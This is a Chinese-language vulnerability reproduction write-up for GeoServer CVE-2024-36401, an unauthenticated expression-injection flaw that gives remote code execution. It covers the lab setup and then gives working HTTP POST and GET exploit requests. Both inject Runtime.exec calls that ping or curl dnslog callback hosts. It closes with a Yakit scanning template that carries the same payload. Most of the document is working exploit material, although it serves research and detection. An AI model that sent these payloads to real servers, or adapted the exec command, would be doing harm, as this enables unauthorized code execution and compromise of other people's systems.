GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

1.漏洞描述

GeoServer 是一个开源的服务器软件，使用 Java 编写，主要功能是允许用户共享和编辑地理空间数据。它在设计时就考虑到了互操作性，支持使用开放标准来发布多种主流格式的空间数据。

GeoServer在版本2.23.6、2.24.4和2.25.2之前，允许未经身份验证的用户通过多个OGC请求参数针对默认GeoServer安装的特别构造的输入利用代码注入漏洞，该漏洞是由于应用不安全地将属性名称作为XPath表达式进行评估，攻击者可以在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。

2.漏洞复现

环境搭建

https://master.dl.sourceforge.net/project/geoserver/GeoServer/2.20.0/geoserver-2.20.0-bin.zip?viasf=1

下载之后，到bin目录启动startup.bat ,由于我这里端口冲突，于是在start.ini修改了端口为8087

漏洞复现：

POST请求

POST /geoserver/wfs HTTP/1.1
Host: 192.168.236.196:8087
Content-Type: application/xml
Content-Length: 334

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'
 valueReference='exec(java.lang.Runtime.getRuntime(),"ping hovmgt.dnslog.cn")'>
 <wfs:Query typeNames='topp:states'/>
</wfs:GetPropertyValue>

可以看到dnslog出现回显，证明命令执行成功

GET 请求：

GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27curl%20fkm7iy.dnslog.cn%27) HTTP/1.1
Host: 192.168.236.196:8087
Cookie: JSESSIONID=node01odk521suledd1lff372goa4v44.node0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

3. yakit检测模版

id: CVE-2024-36401-GeoServer-wfs-rce

info:
  name: GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)
  author: god
  severity: critical
  description: GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)

http:
- raw:
  - |-
    @timeout: 30s
    POST /geoserver/wfs HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/xml
    Content-Length: 324

    <wfs:GetPropertyValue service='WFS' version='2.0.0'
     xmlns:topp='http://www.openplans.org/topp'
     xmlns:fes='http://www.opengis.net/fes/2.0'
     xmlns:wfs='http://www.opengis.net/wfs/2.0'
     valueReference='exec(java.lang.Runtime.getRuntime(),"ping {{interactsh-url}}")'>
     <wfs:Query typeNames='topp:states'/>
    </wfs:GetPropertyValue>

  max-redirects: 3
  matchers-condition: and
  matchers:
      - type: word
        words:
          - "dns"
        part: interactsh_protocol